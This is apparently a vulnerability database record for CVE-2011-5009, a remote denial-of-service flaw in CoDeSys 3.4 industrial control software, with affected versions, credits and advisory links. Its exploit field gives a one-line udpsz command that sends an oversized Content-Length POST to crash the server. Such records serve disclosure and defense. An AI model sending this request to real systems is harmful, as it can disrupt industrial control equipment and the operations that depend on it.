ID

VAR-E-201111-0007


CVE

cve_id:CVE-2011-5009

Trust: 1.9

cve_id:CVE-2011-5007

Trust: 0.3

cve_id:CVE-2011-5008

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

EDB ID

36377


TITLE

CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36377

DESCRIPTION

CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service. CVE-2011-5009CVE-77388 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 36377

AFFECTED PRODUCTS

vendor:codesysmodel: - scope:eqversion:3.4

Trust: 1.0

vendor:3s smartmodel:codesys sp4 patchscope:eqversion:3.42

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:3.4

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:2.3

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:3.5

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:2.3.9.32

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377

EXPLOIT

source: https://www.securityfocus.com/bid/50854/info

CoDeSys is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application and deny service to legitimate users.

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

Trust: 1.0

sources: EXPLOIT-DB: 36377

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36377

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36377

TYPE

POST Null Pointer Content-Length Parsing Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 36377

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 36377

EXTERNAL IDS

db:NVDid:CVE-2011-5009

Trust: 1.9

db:BIDid:50854

Trust: 1.9

db:EXPLOIT-DBid:36377

Trust: 1.6

db:ICS CERTid:ICSA-12-006-01

Trust: 0.6

db:EDBNETid:57721

Trust: 0.6

db:NVDid:CVE-2011-5007

Trust: 0.3

db:NVDid:CVE-2011-5008

Trust: 0.3

db:BIDid:50849

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-5009

Trust: 1.6

url:https://www.securityfocus.com/bid/50854/info

Trust: 1.0

url:http://www.3s-software.com/index.shtml?en_codesysv3_en

Trust: 0.6

url:http://aluigi.altervista.org/adv/codesys_1-adv.txt

Trust: 0.6

url:http://www.us-cert.gov/control_systems/pdf/icsa-12-006-01.pdf

Trust: 0.6

url:https://www.exploit-db.com/exploits/36377/

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

SOURCES

db:BIDid:50854
db:BIDid:50849
db:EXPLOIT-DBid:36377
db:EDBNETid:57721

LAST UPDATE DATE

2022-07-27T09:12:24.849000+00:00


SOURCES UPDATE DATE

db:BIDid:50854date:2012-01-10T20:00:00
db:BIDid:50849date:2012-11-15T23:10:00

SOURCES RELEASE DATE

db:BIDid:50854date:2011-11-30T00:00:00
db:BIDid:50849date:2011-11-29T00:00:00
db:EXPLOIT-DBid:36377date:2011-11-30T00:00:00
db:EDBNETid:57721date:2011-11-30T00:00:00